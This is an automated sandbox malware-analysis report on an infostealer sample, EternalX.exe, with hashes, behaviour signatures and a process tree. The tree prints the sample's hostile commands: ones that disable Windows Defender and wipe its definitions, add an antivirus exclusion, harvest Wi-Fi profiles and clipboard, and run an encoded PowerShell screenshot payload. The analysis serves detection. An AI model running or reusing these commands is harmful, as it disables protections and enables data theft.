Analysis
-
max time kernel
91s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-11-2024 21:47
Behavioral task
behavioral1
Sample
EternalX.exe
Resource
win11-20241007-en
General
-
Target
EternalX.exe
-
Size
6.0MB
-
MD5
3facb013cc1d5433734c272192205a0b
-
SHA1
c85f12ed486b6ffdd6f0ca7b7481747c940ee266
-
SHA256
f5e36cbfb6f6e6ac1e432cc93eb410874d148cd86ed9431d6238c4f589f527a6
-
SHA512
030102fada37d185387c6bb8aa2b654abe740d72ab851a4c3c6621c3899a7163c6af316a5986fd095784def2fb283043188b31851efb9e368a27455317bf6d79
-
SSDEEP
98304:sSEtdFBgwIZFamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RjPMWR3NMWzL:s5FK+eN/FJMIDJf0gsAGK4RjkW4WzL
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 5432 powershell.exe 5540 powershell.exe 4440 powershell.exe 5500 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 5544 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
EternalX.exepid Process 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe 5196 EternalX.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid Process 4820 tasklist.exe 1124 tasklist.exe 5144 tasklist.exe 4816 tasklist.exe -
Processes:
resource yara_rule behavioral1/files/0x001900000002ab91-21.dat upx behavioral1/memory/5196-25-0x00007FFF631E0000-0x00007FFF6364E000-memory.dmp upx behavioral1/files/0x001900000002ab84-27.dat upx behavioral1/memory/5196-30-0x00007FFF6CFF0000-0x00007FFF6D014000-memory.dmp upx behavioral1/files/0x001900000002ab8f-29.dat upx behavioral1/files/0x001900000002ab8b-47.dat upx behavioral1/memory/5196-48-0x00007FFF6CFE0000-0x00007FFF6CFEF000-memory.dmp upx behavioral1/files/0x001900000002ab8a-46.dat upx behavioral1/files/0x001900000002ab89-45.dat upx behavioral1/files/0x001900000002ab88-44.dat upx behavioral1/files/0x001900000002ab87-43.dat upx behavioral1/files/0x001900000002ab86-42.dat upx behavioral1/files/0x001900000002ab85-41.dat upx behavioral1/files/0x001a00000002ab83-40.dat upx behavioral1/files/0x001900000002ab99-39.dat upx behavioral1/files/0x001c00000002ab98-38.dat upx behavioral1/files/0x001900000002ab97-37.dat upx behavioral1/files/0x001900000002ab90-34.dat upx behavioral1/files/0x001900000002ab8e-33.dat upx behavioral1/memory/5196-54-0x00007FFF6CFB0000-0x00007FFF6CFDD000-memory.dmp upx behavioral1/memory/5196-56-0x00007FFF6CC90000-0x00007FFF6CCA9000-memory.dmp upx behavioral1/memory/5196-58-0x00007FFF68C00000-0x00007FFF68C1F000-memory.dmp upx behavioral1/memory/5196-60-0x00007FFF63830000-0x00007FFF639A1000-memory.dmp upx behavioral1/memory/5196-62-0x00007FFF68AE0000-0x00007FFF68AF9000-memory.dmp upx behavioral1/memory/5196-64-0x00007FFF6CC80000-0x00007FFF6CC8D000-memory.dmp upx behavioral1/memory/5196-66-0x00007FFF67970000-0x00007FFF6799E000-memory.dmp upx behavioral1/memory/5196-73-0x00007FFF62E60000-0x00007FFF631D5000-memory.dmp upx behavioral1/memory/5196-74-0x00007FFF6CFF0000-0x00007FFF6D014000-memory.dmp upx behavioral1/memory/5196-71-0x00007FFF63770000-0x00007FFF63828000-memory.dmp upx behavioral1/memory/5196-76-0x00007FFF668D0000-0x00007FFF668E4000-memory.dmp upx behavioral1/memory/5196-79-0x00007FFF67960000-0x00007FFF6796D000-memory.dmp upx behavioral1/memory/5196-78-0x00007FFF6CFB0000-0x00007FFF6CFDD000-memory.dmp upx behavioral1/memory/5196-70-0x00007FFF631E0000-0x00007FFF6364E000-memory.dmp upx behavioral1/memory/5196-82-0x00007FFF62D40000-0x00007FFF62E58000-memory.dmp upx behavioral1/memory/5196-81-0x00007FFF6CC90000-0x00007FFF6CCA9000-memory.dmp upx behavioral1/memory/5196-85-0x00007FFF63830000-0x00007FFF639A1000-memory.dmp upx behavioral1/memory/5196-83-0x00007FFF68C00000-0x00007FFF68C1F000-memory.dmp upx behavioral1/memory/5196-87-0x00007FFF68AE0000-0x00007FFF68AF9000-memory.dmp upx behavioral1/memory/5196-177-0x00007FFF67970000-0x00007FFF6799E000-memory.dmp upx behavioral1/memory/5196-236-0x00007FFF63770000-0x00007FFF63828000-memory.dmp upx behavioral1/memory/5196-258-0x00007FFF62E60000-0x00007FFF631D5000-memory.dmp upx behavioral1/memory/5196-301-0x00007FFF63830000-0x00007FFF639A1000-memory.dmp upx behavioral1/memory/5196-304-0x00007FFF67970000-0x00007FFF6799E000-memory.dmp upx behavioral1/memory/5196-295-0x00007FFF631E0000-0x00007FFF6364E000-memory.dmp upx behavioral1/memory/5196-300-0x00007FFF68C00000-0x00007FFF68C1F000-memory.dmp upx behavioral1/memory/5196-296-0x00007FFF6CFF0000-0x00007FFF6D014000-memory.dmp upx behavioral1/memory/5196-310-0x00007FFF631E0000-0x00007FFF6364E000-memory.dmp upx behavioral1/memory/5196-325-0x00007FFF62E60000-0x00007FFF631D5000-memory.dmp upx behavioral1/memory/5196-335-0x00007FFF63770000-0x00007FFF63828000-memory.dmp upx behavioral1/memory/5196-334-0x00007FFF67970000-0x00007FFF6799E000-memory.dmp upx behavioral1/memory/5196-333-0x00007FFF6CC80000-0x00007FFF6CC8D000-memory.dmp upx behavioral1/memory/5196-332-0x00007FFF68AE0000-0x00007FFF68AF9000-memory.dmp upx behavioral1/memory/5196-331-0x00007FFF63830000-0x00007FFF639A1000-memory.dmp upx behavioral1/memory/5196-330-0x00007FFF68C00000-0x00007FFF68C1F000-memory.dmp upx behavioral1/memory/5196-329-0x00007FFF6CC90000-0x00007FFF6CCA9000-memory.dmp upx behavioral1/memory/5196-328-0x00007FFF6CFB0000-0x00007FFF6CFDD000-memory.dmp upx behavioral1/memory/5196-327-0x00007FFF6CFE0000-0x00007FFF6CFEF000-memory.dmp upx behavioral1/memory/5196-326-0x00007FFF6CFF0000-0x00007FFF6D014000-memory.dmp upx behavioral1/memory/5196-324-0x00007FFF62D40000-0x00007FFF62E58000-memory.dmp upx behavioral1/memory/5196-323-0x00007FFF67960000-0x00007FFF6796D000-memory.dmp upx behavioral1/memory/5196-322-0x00007FFF668D0000-0x00007FFF668E4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 1556 WMIC.exe 5204 WMIC.exe 4944 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 5432 powershell.exe 5500 powershell.exe 5500 powershell.exe 5432 powershell.exe 1872 powershell.exe 1872 powershell.exe 1872 powershell.exe 5816 powershell.exe 5816 powershell.exe 5816 powershell.exe 5540 powershell.exe 5540 powershell.exe 1912 powershell.exe 1912 powershell.exe 4440 powershell.exe 4440 powershell.exe 2320 powershell.exe 2320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exeWMIC.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 5432 powershell.exe Token: SeDebugPrivilege 5500 powershell.exe Token: SeDebugPrivilege 4820 tasklist.exe Token: SeIncreaseQuotaPrivilege 5284 WMIC.exe Token: SeSecurityPrivilege 5284 WMIC.exe Token: SeTakeOwnershipPrivilege 5284 WMIC.exe Token: SeLoadDriverPrivilege 5284 WMIC.exe Token: SeSystemProfilePrivilege 5284 WMIC.exe Token: SeSystemtimePrivilege 5284 WMIC.exe Token: SeProfSingleProcessPrivilege 5284 WMIC.exe Token: SeIncBasePriorityPrivilege 5284 WMIC.exe Token: SeCreatePagefilePrivilege 5284 WMIC.exe Token: SeBackupPrivilege 5284 WMIC.exe Token: SeRestorePrivilege 5284 WMIC.exe Token: SeShutdownPrivilege 5284 WMIC.exe Token: SeDebugPrivilege 5284 WMIC.exe Token: SeSystemEnvironmentPrivilege 5284 WMIC.exe Token: SeRemoteShutdownPrivilege 5284 WMIC.exe Token: SeUndockPrivilege 5284 WMIC.exe Token: SeManageVolumePrivilege 5284 WMIC.exe Token: 33 5284 WMIC.exe Token: 34 5284 WMIC.exe Token: 35 5284 WMIC.exe Token: 36 5284 WMIC.exe Token: SeIncreaseQuotaPrivilege 5284 WMIC.exe Token: SeSecurityPrivilege 5284 WMIC.exe Token: SeTakeOwnershipPrivilege 5284 WMIC.exe Token: SeLoadDriverPrivilege 5284 WMIC.exe Token: SeSystemProfilePrivilege 5284 WMIC.exe Token: SeSystemtimePrivilege 5284 WMIC.exe Token: SeProfSingleProcessPrivilege 5284 WMIC.exe Token: SeIncBasePriorityPrivilege 5284 WMIC.exe Token: SeCreatePagefilePrivilege 5284 WMIC.exe Token: SeBackupPrivilege 5284 WMIC.exe Token: SeRestorePrivilege 5284 WMIC.exe Token: SeShutdownPrivilege 5284 WMIC.exe Token: SeDebugPrivilege 5284 WMIC.exe Token: SeSystemEnvironmentPrivilege 5284 WMIC.exe Token: SeRemoteShutdownPrivilege 5284 WMIC.exe Token: SeUndockPrivilege 5284 WMIC.exe Token: SeManageVolumePrivilege 5284 WMIC.exe Token: 33 5284 WMIC.exe Token: 34 5284 WMIC.exe Token: 35 5284 WMIC.exe Token: 36 5284 WMIC.exe Token: SeIncreaseQuotaPrivilege 4944 WMIC.exe Token: SeSecurityPrivilege 4944 WMIC.exe Token: SeTakeOwnershipPrivilege 4944 WMIC.exe Token: SeLoadDriverPrivilege 4944 WMIC.exe Token: SeSystemProfilePrivilege 4944 WMIC.exe Token: SeSystemtimePrivilege 4944 WMIC.exe Token: SeProfSingleProcessPrivilege 4944 WMIC.exe Token: SeIncBasePriorityPrivilege 4944 WMIC.exe Token: SeCreatePagefilePrivilege 4944 WMIC.exe Token: SeBackupPrivilege 4944 WMIC.exe Token: SeRestorePrivilege 4944 WMIC.exe Token: SeShutdownPrivilege 4944 WMIC.exe Token: SeDebugPrivilege 4944 WMIC.exe Token: SeSystemEnvironmentPrivilege 4944 WMIC.exe Token: SeRemoteShutdownPrivilege 4944 WMIC.exe Token: SeUndockPrivilege 4944 WMIC.exe Token: SeManageVolumePrivilege 4944 WMIC.exe Token: 33 4944 WMIC.exe Token: 34 4944 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EternalX.exeEternalX.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 5468 wrote to memory of 5196 5468 EternalX.exe 78 PID 5468 wrote to memory of 5196 5468 EternalX.exe 78 PID 5196 wrote to memory of 5972 5196 EternalX.exe 79 PID 5196 wrote to memory of 5972 5196 EternalX.exe 79 PID 5196 wrote to memory of 2648 5196 EternalX.exe 80 PID 5196 wrote to memory of 2648 5196 EternalX.exe 80 PID 5196 wrote to memory of 4116 5196 EternalX.exe 82 PID 5196 wrote to memory of 4116 5196 EternalX.exe 82 PID 5972 wrote to memory of 5500 5972 cmd.exe 85 PID 5972 wrote to memory of 5500 5972 cmd.exe 85 PID 2648 wrote to memory of 5432 2648 cmd.exe 86 PID 2648 wrote to memory of 5432 2648 cmd.exe 86 PID 5196 wrote to memory of 432 5196 EternalX.exe 87 PID 5196 wrote to memory of 432 5196 EternalX.exe 87 PID 4116 wrote to memory of 4820 4116 cmd.exe 89 PID 4116 wrote to memory of 4820 4116 cmd.exe 89 PID 432 wrote to memory of 5284 432 cmd.exe 90 PID 432 wrote to memory of 5284 432 cmd.exe 90 PID 5196 wrote to memory of 956 5196 EternalX.exe 92 PID 5196 wrote to memory of 956 5196 EternalX.exe 92 PID 956 wrote to memory of 2356 956 cmd.exe 94 PID 956 wrote to memory of 2356 956 cmd.exe 94 PID 5196 wrote to memory of 916 5196 EternalX.exe 95 PID 5196 wrote to memory of 916 5196 EternalX.exe 95 PID 916 wrote to memory of 4296 916 cmd.exe 97 PID 916 wrote to memory of 4296 916 cmd.exe 97 PID 5196 wrote to memory of 3780 5196 EternalX.exe 98 PID 5196 wrote to memory of 3780 5196 EternalX.exe 98 PID 3780 wrote to memory of 4944 3780 cmd.exe 100 PID 3780 wrote to memory of 4944 3780 cmd.exe 100 PID 5196 wrote to memory of 2268 5196 EternalX.exe 101 PID 5196 wrote to memory of 2268 5196 EternalX.exe 101 PID 2268 wrote to memory of 1556 2268 cmd.exe 103 PID 2268 wrote to memory of 1556 2268 cmd.exe 103 PID 5196 wrote to memory of 4604 5196 EternalX.exe 104 PID 5196 wrote to memory of 4604 5196 EternalX.exe 104 PID 5196 wrote to memory of 3808 5196 EternalX.exe 105 PID 5196 wrote to memory of 3808 5196 EternalX.exe 105 PID 5196 wrote to memory of 3816 5196 EternalX.exe 108 PID 5196 wrote to memory of 3816 5196 EternalX.exe 108 PID 5196 wrote to memory of 3392 5196 EternalX.exe 109 PID 5196 wrote to memory of 3392 5196 EternalX.exe 109 PID 5196 wrote to memory of 5584 5196 EternalX.exe 110 PID 5196 wrote to memory of 5584 5196 EternalX.exe 110 PID 5196 wrote to memory of 5556 5196 EternalX.exe 114 PID 5196 wrote to memory of 5556 5196 EternalX.exe 114 PID 4604 wrote to memory of 1124 4604 cmd.exe 116 PID 4604 wrote to memory of 1124 4604 cmd.exe 116 PID 5196 wrote to memory of 5152 5196 EternalX.exe 117 PID 5196 wrote to memory of 5152 5196 EternalX.exe 117 PID 3808 wrote to memory of 5144 3808 cmd.exe 118 PID 3808 wrote to memory of 5144 3808 cmd.exe 118 PID 5196 wrote to memory of 572 5196 EternalX.exe 119 PID 5196 wrote to memory of 572 5196 EternalX.exe 119 PID 5584 wrote to memory of 4816 5584 cmd.exe 120 PID 5584 wrote to memory of 4816 5584 cmd.exe 120 PID 3816 wrote to memory of 5000 3816 cmd.exe 123 PID 3816 wrote to memory of 5000 3816 cmd.exe 123 PID 3392 wrote to memory of 1872 3392 cmd.exe 124 PID 3392 wrote to memory of 1872 3392 cmd.exe 124 PID 5556 wrote to memory of 2360 5556 cmd.exe 125 PID 5556 wrote to memory of 2360 5556 cmd.exe 125 PID 5196 wrote to memory of 2860 5196 EternalX.exe 126 PID 5196 wrote to memory of 2860 5196 EternalX.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\EternalX.exe"C:\Users\Admin\AppData\Local\Temp\EternalX.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5468 -
C:\Users\Admin\AppData\Local\Temp\EternalX.exe"C:\Users\Admin\AppData\Local\Temp\EternalX.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EternalX.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EternalX.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5584 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5556 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5152 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:572
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2860
-
